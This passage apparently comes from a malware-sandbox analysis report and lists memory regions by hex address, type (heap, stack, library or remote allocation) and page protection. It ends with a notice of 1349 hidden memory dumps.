stack
|
page read and write
|
||
58F1000
|
heap
|
page read and write
|
||
580C000
|
heap
|
page read and write
|
||
4D64000
|
trusted library allocation
|
page read and write
|
||
1F06A97B000
|
heap
|
page read and write
|
||
4A41000
|
heap
|
page read and write
|
||
1C3F5C89000
|
heap
|
page read and write
|
||
2787000
|
heap
|
page read and write
|
||
52C0000
|
heap
|
page read and write
|
||
2880830E000
|
trusted library allocation
|
page read and write
|
||
586F000
|
heap
|
page read and write
|
||
58E2000
|
heap
|
page read and write
|
||
29F6D9D1000
|
heap
|
page read and write
|
||
2880831A000
|
trusted library allocation
|
page read and write
|
||
29F6BAEC000
|
heap
|
page read and write
|
||
1C3F6C8A000
|
heap
|
page read and write
|
||
28801F41000
|
trusted library allocation
|
page read and write
|
||
246E76D5000
|
heap
|
page read and write
|
||
8D01000
|
trusted library allocation
|
page read and write
|
||
753A000
|
trusted library allocation
|
page read and write
|
||
2720000
|
heap
|
page read and write
|
||
87C0000
|
trusted library allocation
|
page read and write
|
||
1C2D9829000
|
heap
|
page read and write
|
||
29F6D9F8000
|
heap
|
page read and write
|
||
4A21000
|
heap
|
page read and write
|
||
4A30000
|
trusted library allocation
|
page read and write
|
||
29F6BCF0000
|
heap
|
page read and write
|
||
7E10000
|
trusted library allocation
|
page read and write
|
||
1C2DBA0D000
|
trusted library allocation
|
page read and write
|
||
2E10000
|
heap
|
page read and write
|
||
2A30000
|
heap
|
page read and write
|
||
1C2F3850000
|
heap
|
page execute and read and write
|
||
1C3F6CD3000
|
heap
|
page read and write
|
||
1C2D9854000
|
heap
|
page read and write
|
||
1C3F3E24000
|
heap
|
page read and write
|
||
1F06A932000
|
heap
|
page read and write
|
||
7DA0000
|
trusted library allocation
|
page read and write
|
||
1C3F3E52000
|
heap
|
page read and write
|
||
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
1C3F3DF6000
|
heap
|
page read and write
|
||
1F0689F9000
|
heap
|
page read and write
|
||
1C3F6CF9000
|
heap
|
page read and write
|
||
1C2DB90D000
|
trusted library allocation
|
page read and write
|
||
28809741000
|
trusted library allocation
|
page read and write
|
||
1C3F5C6E000
|
heap
|
page read and write
|
||
717E000
|
heap
|
page read and write
|
||
2880825F000
|
trusted library allocation
|
page read and write
|
||
1F06A964000
|
heap
|
page read and write
|
||
2DA1000
|
heap
|
page read and write
|
||
32AF000
|
stack
|
page read and write
|
||
5C73000
|
heap
|
page read and write
|
||
278A0FE000
|
stack
|
page read and write
|
||
C59B58F000
|
stack
|
page read and write
|
||
4F36000
|
heap
|
page read and write
|
||
584BBFF000
|
stack
|
page read and write
|
||
3320000
|
heap
|
page read and write
|
||
4BF7000
|
trusted library allocation
|
page read and write
|
||
6B6E000
|
trusted library allocation
|
page read and write
|
||
1C2DB490000
|
heap
|
page read and write
|
||
4F6E000
|
heap
|
page read and write
|
||
816E000
|
stack
|
page read and write
|
||
2760000
|
heap
|
page read and write
|
||
1C3F6510000
|
heap
|
page read and write
|
||
809D000
|
stack
|
page read and write
|
||
246E7700000
|
direct allocation
|
page read and write
|
||
5960000
|
trusted library allocation
|
page read and write
|
||
7E00000
|
trusted library allocation
|
page execute and read and write
|
||
D9790FF000
|
stack
|
page read and write
|
||
1F0689FF000
|
heap
|
page read and write
|
||
64CC000
|
stack
|
page read and write
|
||
6329000
|
trusted library allocation
|
page read and write
|
||
5DD1000
|
heap
|
page read and write
|
||
29F6D9B3000
|
heap
|
page read and write
|
||
4A182FF000
|
stack
|
page read and write
|
||
5959000
|
heap
|
page read and write
|
||
5C14000
|
heap
|
page read and write
|
||
58F0000
|
heap
|
page read and write
|
||
57A5000
|
heap
|
page read and write
|
||
5A8000
|
stack
|
page read and write
|
||
5700000
|
heap
|
page read and write
|
||
612E000
|
heap
|
page read and write
|
||
7C2E000
|
stack
|
page read and write
|
||
27E2000
|
heap
|
page read and write
|
||
881D000
|
stack
|
page read and write
|
||
7FFD9BB31000
|
trusted library allocation
|
page read and write
|
||
7B3C000
|
heap
|
page read and write
|
||
73C0000
|
trusted library allocation
|
page read and write
|
||
29F6BACB000
|
heap
|
page read and write
|
||
1C3F5C8F000
|
heap
|
page read and write
|
||
6C1D000
|
stack
|
page read and write
|
||
611D000
|
heap
|
page read and write
|
||
5804000
|
heap
|
page read and write
|
||
1F06A932000
|
heap
|
page read and write
|
||
7EAE000
|
stack
|
page read and write
|
||
2789DDE000
|
stack
|
page read and write
|
||
5F76000
|
heap
|
page read and write
|
||
27E4000
|
heap
|
page read and write
|
||
653C000
|
stack
|
page read and write
|
||
6093000
|
heap
|
page read and write
|
||
29F6BAD9000
|
heap
|
page read and write
|
||
C59A7FD000
|
stack
|
page read and write
|
||
1C2D97F1000
|
heap
|
page read and write
|
||
1C3F5C88000
|
heap
|
page read and write
|
||
5966000
|
heap
|
page read and write
|
||
1C3F3DC9000
|
heap
|
page read and write
|
||
4A38000
|
heap
|
page read and write
|
||
2AB5000
|
heap
|
page read and write
|
||
49A5000
|
heap
|
page execute and read and write
|
||
7FFD9BA36000
|
trusted library allocation
|
page read and write
|
||
1F068A24000
|
heap
|
page read and write
|
||
1C2DBA62000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
1C3F5F61000
|
heap
|
page read and write
|
||
1C3F6CC7000
|
heap
|
page read and write
|
||
C59AA7B000
|
stack
|
page read and write
|
||
2DE0000
|
heap
|
page read and write
|
||
5770000
|
heap
|
page read and write
|
||
5BE9000
|
heap
|
page read and write
|
||
4F33000
|
heap
|
page read and write
|
||
D9791FF000
|
stack
|
page read and write
|
||
4E77000
|
heap
|
page read and write
|
||
1C3F3DD7000
|
heap
|
page read and write
|
||
5460000
|
remote allocation
|
page read and write
|
||
2D85000
|
heap
|
page read and write
|
||
1C3F5F6F000
|
heap
|
page read and write
|
||
4A5E000
|
heap
|
page read and write
|
||
346F000
|
stack
|
page read and write
|
||
29F6DA38000
|
heap
|
page read and write
|
||
5791000
|
heap
|
page read and write
|
||
2787000
|
heap
|
page read and write
|
||
246E76E0000
|
heap
|
page read and write
|
||
1C3F5F2E000
|
heap
|
page read and write
|
||
57C6000
|
heap
|
page read and write
|
||
1C2DB5D4000
|
trusted library allocation
|
page read and write
|
||
49D1000
|
trusted library allocation
|
page read and write
|
||
4A184FC000
|
stack
|
page read and write
|
There are 1349 hidden memdumps, click here to show them.